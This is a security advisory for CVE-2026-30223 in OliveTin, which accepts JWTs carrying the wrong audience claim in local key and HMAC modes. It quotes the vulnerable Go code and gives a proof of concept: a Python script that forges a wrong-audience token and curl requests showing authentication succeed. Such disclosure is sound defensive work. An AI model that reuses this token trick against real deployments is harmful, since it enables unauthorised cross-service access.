CVE-2026-30223
HIGH8.8EPSS 0.04%OliveTin has JWT Audience Validation Bypass in Local Key and HMAC Modes
Description
### Summary When JWT authentication is configured using either: - `authJwtPubKeyPath` (local RSA public key), or - `authJwtHmacSecret` (HMAC secret), the configured audience value (`authJwtAud`) is not enforced during token parsing. As a result, validly signed JWT tokens with an incorrect `aud` claim are accepted for authentication. This allows authentication using tokens intended for a different audience/service. ### Details **Affected Code** File: `jwt.go` Lines: 51–59, 144–157, 161–168 **Current Behavior** Remote JWKS Mode (Correct): ```go return jwt.Parse(jwtToken, jwksVerifier.Keyfunc, jwt.WithAudience(cfg.AuthJwtAud)) ``` Audience validation is enforced. Local Public Key Mode (Vulnerable): ```go return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... }) ``` No `jwt.WithAudience()` option is provided. HMAC Mode (Vulnerable): ```go return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... }) ``` No `jwt.WithAudience()` option is provided. **Why This Is Vulnerable:** `authJwtAud` is ignored for `authJwtPubKeyPath` and `authJwtHmacSecret` modes, so wrong-audience tokens are accepted. ### PoC 1. **Configure OliveTin** Use a minimal config with JWT local key authentication: ```yaml authJwtPubKeyPath: ./public.pem authJwtHeader: Authorization authJwtClaimUsername: sub authJwtAud: expected-audience authRequireGuestsToLogin: true ``` 2. **Generate a Wrong-Audience Token** ```python python3 - <<EOF import jwt, datetime with open("private.pem") as f: key = f.read() token = jwt.encode( { "sub": "low", "aud": "wrong-audience", # intentionally wrong "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30) }, key, algorithm="RS256" ) print(token) EOF ``` This prints the `$WRONG_AUD_TOKEN`. 3. **Test Without Token (Baseline)** ```bash curl -i -X POST http://localhost:1337/api/WhoAmI \ -H 'Content-Type: application/json' \ -d '{}' ``` Expected response: ``` HTTP/1.1 401 Unauthorized ``` 4. **Test With Wrong-Audience Token** ```bash curl -i -X POST http://localhost:1337/api/WhoAmI \ -H 'Content-Type: application/json' \ -H "Authorization: Bearer $WRONG_AUD_TOKEN" \ -d '{}' ``` Expected response: ``` HTTP/1.1 200 OK {"authenticatedUser":"low","provider":"jwt","usergroup":"","acls":[],"sid":""} ``` Authentication succeeds even though the `aud` claim is incorrect. ### Impact An attacker who possesses a valid JWT signed by the configured key (or HMAC secret) but intended for a different audience can authenticate successfully. This enables: - Cross-service token reuse - Authentication using tokens issued for other systems - Trust boundary violation in multi-service environments This is particularly severe when: - OliveTin is deployed behind a centralized SSO provider - The same signing key is reused across services - Audience restrictions are relied upon for service isolation This does **not** bypass ACL authorization. It is strictly an authentication validation flaw.
Affected packages (2)
- Go/github.com/OliveTin/OliveTinfrom 0, < 0.0.0-20260304231339-e97d8ecbd8d6
- Go/github.com/OliveTin/OliveTinfrom 0, < 0.0.0-20260304231339-e97d8ecbd8d6
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH8.8 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-30223
- PATCHhttps://github.com/OliveTin/OliveTin
- WEBhttps://github.com/OliveTin/OliveTin/commit/e97d8ecbd8d6ba468c418ca496fcd18f78131233
- WEBhttps://github.com/OliveTin/OliveTin/releases/tag/3000.11.1
- WEBhttps://github.com/OliveTin/OliveTin/security/advisories/GHSA-g962-2j28-3cg9